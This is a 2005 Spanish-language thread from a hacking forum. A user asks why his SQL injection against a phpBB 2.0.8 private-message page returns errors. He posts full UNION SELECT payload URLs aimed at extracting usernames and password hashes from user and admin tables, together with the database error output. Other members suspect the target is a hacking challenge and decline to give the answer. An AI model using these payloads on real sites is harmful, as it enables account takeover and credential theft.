elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  ayuda con inyeccion sql
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con inyeccion sql  (Leído 2,896 veces)
tormenta

Desconectado Desconectado

Mensajes: 17


Ver Perfil
ayuda con inyeccion sql
« en: 24 Marzo 2005, 17:13 »

no soy muy bueno con las inyecciones sql pero un amigo me ha dejado hacer algunas pruebas. hago la inyeccion pero me saca error, mi pregunta es que estoy haciendo mal? la version es 2.0.8. estoy cometiendo algun error en el codigo o este no es el codigo que debo utilizar? gracias por su ayuda.




http://www.xxxxx.com/xxxx/xxxxxx/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=1LIMIT1/*

DEBUG MODE

SQL Error : 1054 Unknown column 'username' in 'field list'

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=2LIMIT1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 246
File : /home/xxxx/public_html/xxxx/xxxxxxxx/privmsg.php





http://www.xxxx.com/xxxxxx/xxxxxx/privmsg.php?mode=post&u=2=name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20cualquiera=1%20LIMIT%201/*



Could not query private message post information

DEBUG MODE

SQL Error : 1146 Table 'cualquiera_hola.nuke_authors' doesn't exist

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM nuke_authors WHERE cualquiera=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 246
File : /home/xxxxxx/public_html/xxxx/xxxxxxx/privmsg.php
 

 
« Última modificación: 29 Marzo 2005, 16:41 por tormenta » En línea

NiG

Desconectado Desconectado

Mensajes: 2


I. H. A. RØØL


Ver Perfil WWW
Re: ayuda con inyeccion sql
« Respuesta #1 en: 29 Marzo 2005, 09:31 »

el error me parece q esta en algo q estas asumiendo q existe y en realidad no es asi... o por lo menos tiene otro nombre revisala...


//.. Esta pregunta puede q no encaje en ciertos estandares de la famosa "etica hacker" por lo cual puede causar malestar en ciertas personas, en todo caso abstenerse a postear y consultar al respectivo Moderador, el cual tene el derecho de decidir ... //

En línea


IRC: irc.irc-domain.org #infohackargentina
tormenta

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: ayuda con inyeccion sql
« Respuesta #2 en: 29 Marzo 2005, 16:46 »

agradezco tu respuesta rusafe. tambien queria decirte que
mi intencion no es molestar a alguien, o hacerle daño.
La practica la estoy haciendo en la web de una amigo con su permiso porque ambos queremos aprender en en que consiste el bug y como se soluciona.
Sinembargo mi experiencia con este tema no es muy buena y por eso pido ayuda.
En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.322


Peace & Love


Ver Perfil WWW
Re: ayuda con inyeccion sql
« Respuesta #3 en: 29 Marzo 2005, 22:41 »

agradezco tu respuesta rusafe. tambien queria decirte que
mi intencion no es molestar a alguien, o hacerle daño.
La practica la estoy haciendo en la web de una amigo con su permiso porque ambos queremos aprender en en que consiste el bug y como se soluciona.
Sinembargo mi experiencia con este tema no es muy buena y por eso pido ayuda.

Estas seguro?  A mi me parece mas bien el reto de hackyashira que hay que hackear el foro. Se parece en un 97% y  lo se por el contenido de la base de datos. Y mira que coincidencia el foro de hackyashira tambien es un 2.0.8

No le den la respuesta a los retos.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
Colymore


Desconectado Desconectado

Mensajes: 420


uid=0(root) gid=0(root) grupos=0(root)


Ver Perfil WWW
Re: ayuda con inyeccion sql
« Respuesta #4 en: 30 Marzo 2005, 06:45 »

uyyy casi cuela tormenta..xDD..no intentes que te den los retos exos eso no sirve de nada...si t provoca sadisfacion personal aya tu pero asi no aprenderas nada
« Última modificación: 2 Abril 2005, 05:28 por CoLyMoRe » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda en una inyeccion sql
Nivel Web
xustyx 5 3,418 Último mensaje 27 Junio 2011, 13:51
por xustyx
INYECCION SQL MANUAL AYUDA
Bugs y Exploits
NIKOLAY7 0 1,598 Último mensaje 5 Enero 2013, 20:00
por NIKOLAY7
ayuda, como progresar con las inyección sql
Nivel Web
Zeta1337 1 1,722 Último mensaje 21 Abril 2015, 09:20
por exploiterstack
Ayuda con inyección SQL
Nivel Web
pr0t0t1p3 1 2,294 Último mensaje 19 Mayo 2016, 17:46
por odeONeSs
inyeccion dll c++ ayuda
Programación General
Borito30 6 1,654 Último mensaje 27 Noviembre 2016, 12:52
por Borito30
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines